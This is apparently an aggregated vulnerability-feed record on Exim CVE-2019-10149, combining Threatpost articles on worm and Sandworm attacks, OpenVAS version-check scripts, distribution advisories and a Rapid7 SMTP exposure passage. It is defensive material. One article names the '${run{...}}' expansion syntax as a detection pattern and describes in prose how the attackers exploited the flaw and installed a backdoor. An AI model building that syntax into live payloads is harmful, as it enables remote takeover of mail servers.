\u201cThey used hidden services on the TOR network to host their payloads and created deceiving windows i[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/14093602/exim.png>)con files [which is actually a password protected zip archive containing the coin miner executable] in an attempt to throw off researchers and even system administrators who are looking at their logs.\u201d\n\nResearchers said that they are still looking for further information about the attack, but in the meantime urged users to patch every Exim installation in their organization and make sure that it is updated to the most recent version, Exim version 4.92.\n\n\u201cThe prevalence of vulnerable Exim servers (3,683,029 across the globe according to Shodan) allows attackers to compromise many servers in a relatively short period of time, as well as generate a nice stream of cryptocurrency revenue,\u201d researchers said.\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. 
_****_Join _****_Threatpost _****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "modified": "2019-06-14T14:04:30", "published": "2019-06-14T14:04:30", "id": "THREATPOST:406129F1455008D4B9A55FF40B09CCAF", "href": "https://threatpost.com/linux-servers-worm-exim-flaw/145698/", "type": "threatpost", "title": "Millions of Linux Servers Under Worm Attack Via Exim Flaw", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:24:47", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149", "CVE-2020-5135"], "description": "The Russia-linked APT group Sandworm has been spotted exploiting a vulnerability in the internet\u2019s top email server software, according to the National Security Agency (NSA).\n\nThe bug exists in the Exim Mail Transfer Agent (MTA) software, an open-source offering used on Linux and Unix-like systems. It essentially receives, routes and delivers email messages from local users and remote hosts. Exim is the default MTA included on some Linux distros like Debian and Red Hat, and Exim-based mail servers in general run almost 57 percent of the internet\u2019s email servers, according to [a survey last year](<http://www.securityspace.com/s_survey/data/man.201905/mxsurvey.html>).\n\nThe bug ([CVE-2019-10149](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>)) would allow an unauthenticated remote attacker to execute commands with root privileges on an Exim mail server, allowing the attacker to install programs, modify data and create new accounts. It\u2019s also wormable; a previous campaign spread cryptominers automatically from system to system using a port sniffer. 
The bug was patched last June.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe NSA this week released a cybersecurity advisory on new exploit activity from Unit 74455 of the GRU Main Center for Special Technologies (GTsST), a division of the Russian military intelligence service, a.k.a. Sandworm, a.k.a. BlackEnergy. The APT [has been linked to](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) the Industroyer attack on the Ukrainian power grid as well as the [infamous NotPetya attacks](<https://threatpost.com/maersk-shipping-reports-300m-loss-stemming-from-notpetya-attack/127477/>). According to Kaspersky, the group is part of a nexus of related APTs that also includes a [recently discovered group called Zebrocy](<https://threatpost.com/zebrocy-russian-apt/145328/>).\n\nThe NSA advisory describes the observed exploitation as a specially crafted Simple Mail Transfer Protocol (SMTP) message containing a modified \u201cMAIL FROM\u201d field. Note that the underlying flaw is in Exim\u2019s handling of recipient addresses, so detection should look for ${run{...}} payloads in any SMTP envelope field rather than relying on a single field name. The APT has been exploiting unpatched Exim servers in this way since at least August 2019, according to [the NSA\u2019s advisory](<https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf>).\n\nOnce Sandworm compromises a target Exim server, it subsequently downloads and executes a shell script from a Sandworm-controlled domain to establish a persistent backdoor that can be used for reconnaissance, spying on mail messages, lateral movement and additional malware implantation.\n\n\u201cThis script would attempt to do the following on the victim machine: Add privileged users; disable network security settings; update SSH configurations to enable additional remote access; and execute an additional script to enable follow-on exploitation,\u201d according to the NSA, which didn\u2019t disclose any details as to the victimology of the latest offensives. Because the backdoor survives patching Exim, updating alone is not a complete response: hosts that were exposed while vulnerable should also be checked for new privileged accounts, altered SSH configuration and firewall changes.\n\nExim admins should update their MTAs to [version 
4.93 or newer](<https://exim.org/mirrors.html>) to mitigate the issue, the NSA noted.\n\n\u201cThis emphasizes the need for a good vulnerability management plan,\u201d Lamar Bailey, senior director of security research at Tripwire, said via email. \u201cCVE-2019-10149 has been out almost a year now and has a CVSS score above 9, making it a critical vulnerability. High-scoring vulnerabilities on a production email server are high risk and there should be plans in place to remediate them ASAP.\u201d\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. 
_**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "modified": "2020-05-29T16:34:38", "published": "2020-05-29T16:34:38", "id": "THREATPOST:130EDA07603C228BE562B445904A297A", "href": "https://threatpost.com/nsa-sandworm-spy-attacks-exim-mail-servers/156125/", "type": "threatpost", "title": "NSA Warns of Sandworm Backdoor Attacks on Mail Servers", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-01-31T16:54:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-06-08T00:00:00", "id": "OPENVAS:1361412562310852550", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852550", "type": "openvas", "title": "openSUSE: Security Advisory for Security (openSUSE-SU-2019:1524-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852550\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-10149\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-06-08 02:01:02 +0000 (Sat, 08 Jun 2019)\");\n script_name(\"openSUSE: Security Advisory for Security (openSUSE-SU-2019:1524-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:1524-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-06/msg00020.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Security'\n package(s) announced via the openSUSE-SU-2019:1524-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"exim was updated to fix a security issue.\n\n - CVE-2019-10149: Fixed a Remote Command Execution in exim (bsc#1136587)\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n 
- openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-1524=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-1524=1\");\n\n script_tag(name:\"affected\", value:\"'Security' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-07T14:49:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "description": "The remote host is missing an update for the ", "modified": "2019-06-06T00:00:00", "published": "2019-06-06T00:00:00", "id": "OPENVAS:1361412562310704456", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310704456", "type": "openvas", "title": "Debian Security Advisory DSA 4456-1 (exim4 - security update)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704456\");\n script_version(\"2019-06-06T02:00:08+0000\");\n script_cve_id(\"CVE-2019-10149\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-06 02:00:08 +0000 (Thu, 06 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-06 02:00:08 +0000 (Thu, 06 Jun 2019)\");\n script_name(\"Debian Security Advisory DSA 4456-1 (exim4 - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n 
script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4456.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4456-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the DSA-4456-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. Improper validation of the recipient address in the\ndeliver_message() function may result in the execution of arbitrary\ncommands.\");\n\n script_tag(name:\"affected\", value:\"'exim4' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u4.\n\nWe recommend that you upgrade your exim4 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"exim4\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n 
report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-07T14:49:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "description": "Exim is prone to an unauthenticated remote code execution vulnerability.", "modified": "2019-06-07T00:00:00", "published": "2019-06-07T00:00:00", "id": "OPENVAS:1361412562310140090", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140090", "type": "openvas", "title": "Exim 4.87 - 4.91 RCE Vulnerability", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:exim:exim\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140090\");\n script_version(\"2019-06-07T01:42:55+0000\");\n script_tag(name:\"last_modification\", value:\"2019-06-07 01:42:55 +0000 (Fri, 07 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-07 01:35:15 +0000 (Fri, 07 Jun 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-10149\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Exim 4.87 - 4.91 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_exim_detect.nasl\");\n script_mandatory_keys(\"exim/installed\");\n\n script_tag(name:\"summary\", value:\"Exim is prone to an unauthenticated remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Improper validation of recipient address in deliver_message() function in\n /src/deliver.c may lead to remote command execution.\");\n\n script_tag(name:\"affected\", value:\"Exim version 4.87 to 4.91.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.92 or later or apply the provided patch.\");\n\n script_xref(name:\"URL\", value:\"https://www.exim.org/static/doc/security/CVE-2019-10149.txt\");\n script_xref(name:\"URL\", value:\"https://www.openwall.com/lists/oss-security/2019/06/05/3\");\n\n 
exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"4.87\", test_version2: \"4.91\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.92\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-07T14:49:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "description": "The remote host is missing an update for the ", "modified": "2019-06-06T00:00:00", "published": "2019-06-06T00:00:00", "id": "OPENVAS:1361412562310844043", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844043", "type": "openvas", "title": "Ubuntu Update for exim4 USN-4010-1", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844043\");\n script_version(\"2019-06-06T13:02:35+0000\");\n script_cve_id(\"CVE-2019-10149\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-06 13:02:35 +0000 (Thu, 06 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-06 02:00:49 +0000 (Thu, 06 Jun 2019)\");\n script_name(\"Ubuntu Update for exim4 USN-4010-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU18\\.10)\");\n\n script_xref(name:\"USN\", value:\"4010-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-June/004942.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the USN-4010-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that Exim incorrectly handled certain decoding\noperations. 
A remote attacker could possibly use this issue to execute\narbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"'exim4' package(s) on Ubuntu 18.10, Ubuntu 18.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.90.1-1ubuntu1.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.90.1-1ubuntu1.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.91-6ubuntu1.1\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.91-6ubuntu1.1\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2019-06-06T21:21:43", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10149"], "description": "### Background\n\nExim is a message transfer agent (MTA) designed to be a a highly configurable, drop-in replacement for sendmail. \n\n### Description\n\nA vulnerability was discovered in how Exim validates recipient addresses in the deliver_message() function. 
\n\n### Impact\n\nA remote attacker could execute arbitrary commands by sending an email with a specially crafted recipient address to the affected system. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Exim users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/exim-4.92\"", "edition": 1, "modified": "2019-06-06T00:00:00", "published": "2019-06-06T00:00:00", "id": "GLSA-201906-01", "href": "https://security.gentoo.org/glsa/201906-01", "title": "Exim: Remote command execution", "type": "gentoo", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2019-06-07T14:41:41", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10149"], "description": "\nExim team and Qualys report:\n\n\n\t We received a report of a possible remote exploit. Currently there is no evidence of an active use of this exploit.\n\t \n\n\t A patch exists already, is being tested, and backported to all\n\t versions we released since (and including) 4.87.\n\t \n\n\t The severity depends on your configuration. It depends on how close to\n\t the standard configuration your Exim runtime configuration is. The\n\t closer the better.\n\t \n\n\t Exim 4.92 is not vulnerable.\n\t \n\n", "edition": 2, "modified": "2019-05-27T00:00:00", "published": "2019-05-27T00:00:00", "id": "45BEA6B5-8855-11E9-8D41-97657151F8C2", "href": "https://vuxml.freebsd.org/freebsd/45bea6b5-8855-11e9-8d41-97657151f8c2.html", "title": "Exim -- RCE in deliver_message() function", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-10-02T14:39:33", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149"], "description": "\n\nWelcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. 
The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?\n\nSo, here we are! What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)\n\n \n\n\n## SMTP (25/465/587)\n\n_The \u201cSimple\u201d in SMTP is intended to be ironic._\n\n#### TLDR\n\n * **WHAT IT IS:** A usually cleartext, text-based standard for delivering email between networks.\n * **HOW MANY**: 5,805,012 discovered nodes on port 25 and 4,007,931 on port 587. SMTPS on port 465 comes in with 3,494,067. All together, that's 13,307,010 distinct service nodes. 3,023,486 (52%) have Recog fingerprints (43 total service families)\n * **VULNERABILITIES: **The natively cleartext nature of email is the primary concern around the security of this protocol. Email is also the most popular method for phishing users into revealing passwords and running malware. Finally, there are at least two serious vulnerabilities in popular mail servers Exim and Microsoft Exchange deployed today.\n * **ADVICE: **Mail administrators need to be fanatical about applying security patches as they become available, and should implement DMARC anti-spoofing controls yesterday.\n * **ALTERNATIVES: **Outsourcing email to a cloud provider, such as Google or Microsoft, is often the right choice when comparing the costs of effectively maintaining this critical internet infrastructure.\n * **GETTING: **Better (25/587)! 
Fewer crazy people are hosting their own mail.\n\n### SMTP discovery details\n\nWhile SMTP is traditionally cleartext with an optional secure protocol negotiation called STARTTLS, we're seeing more SSL-wrapped SMTP, also known as SMTPS, in the world today. The following charts and tables illustrate the distribution of SMTP over port 25, SMTP on port 587 (which is intended for SMTP-to-SMTP relaying of messages), and SMTPS on port 465.\n\n Country | SMTP (25) | SMTP (587) | SMTPS (465) \n---|---|---|--- \nUnited States | 1,467,077 | 1,456,598 | 1,253,805 \nGermany | 637,569 | 373,266 | 375,526 \nJapan | 589,222 | 382,133 | 222,633 \nFrance | 398,390 | 212,937 | 196,177 \nPoland | 306,368 | 289,522 | 284,297 \nSpain | 291,844 | 44,435 | 48,694 \nRussia | 245,814 | 104,709 | 95,972 \nUnited Kingdom | 193,073 | 121,902 | 122,069 \nNetherlands | 189,456 | 129,690 | 115,211 \nCanada | 137,342 | 146,323 | 132,133 \n Provider | SMTP (25) | SMTP (587) | SMTPS (465) \n---|---|---|--- \nOVHcloud | 317,584 | 248,695 | 236,772 \nAmazon | 95,175 | 32,579 | 31,438 \nDigitalOcean | 74,097 | 46,521 | 41,234 \nScaleway | 30,876 | 15,332 | 12,594 \nQuadraNet | 29,282 | 18,200 | 8,667 \nGoogle | 29,030 | 50,422 | 50,561 \nMicrosoft | 14,945 | 5,576 | 2,790 \nRackspace | 8,459 | 2,511 | 1,841 \nAlibaba | 5,729 | 3,863 | 3,826 \nOracle | 1,274 | 509 | 345 \n \nAs far as top-level domains are concerned, we see that the vast majority of SMTP lives in dot-com land\u2014we counted over 100 million MX records in dot-com registrations, with a sharp drop-off in dot-de, dot-net, and dot-org, with about 10 million MX records in each.\n\n### SMTP exposure information\n\nThere are dozens of SMTP servers to choose from, each with their own idiosyncratic methods of configuration, spam filtering, and security. The top SMTP server we're able to fingerprint is Postfix, with over a million and a half installs, followed by Exim, Exchange, and trusty Sendmail. 
The table below is the complete list of every SMTP server we positively identified\u2014mail administrators will recognize the vestiges of old, little-used mail servers, such as the venerable Lotus Domino and ZMailer. If these are your mail servers, think long and hard about why you\u2019re still running these as opposed to simply farming this thankless chore out to a dedicated mail service provider.\n\nSMTP Family | Count \n---|--- \nPostfix | 1,679,222 \nexim | 759,799 \nExchange Server | 182,263 \nSendmail | 180,812 \nMail Server | 84,262 \nIIS | 58,720 \nEcelerity Mail Server | 25,206 \nMDaemon | 14,404 \nConnect | 10,447 \nIMail Server | 5,354 \nPro | 3,462 \nIBM Domino | 3,445 \nTwisted | 1,999 \nUTM | 1,926 \nWinWebMail | 1,879 \nEmail Security | 1,867 \nListManager | 1,785 \nLotus Domino | 1,734 \nDavid | 1,490 \nPowerMTA | 1,239 \nCCProxy | 675 \nMailSite | 305 \nPost.Office | 275 \nVPOP3 | 245 \nZMailer | 205 \nGroupWise | 176 \nCheck Point | 78 \nWinRoute | 43 \nMessaging Server | 40 \nVOPMail | 24 \nIntraStore | 22 \nInternet Mail Server | 18 \nNTMail | 17 \nMercury Mail Transport System | 15 \nFWTK | 9 \nSLMail | 8 \nFTGate | 4 \nInternet Mail Services | 4 \nVM | 3 \nMail-Max | 2 \nAppleShare IP Mail Server | 1 \nMERCUR | 1 \nWebShield | 1 \n \nFinally, let's take a quick look at the Exim mail server. Like most other popular software on the internet, we can find all sorts of versions. Unlike other popular software, Exim versioning moves pretty quickly\u2014the current version of Exim at the time of scanning was v 4.93, and has already incremented to 4.94 by the time of publication. However, the popularity of the latest version (4.93) versus 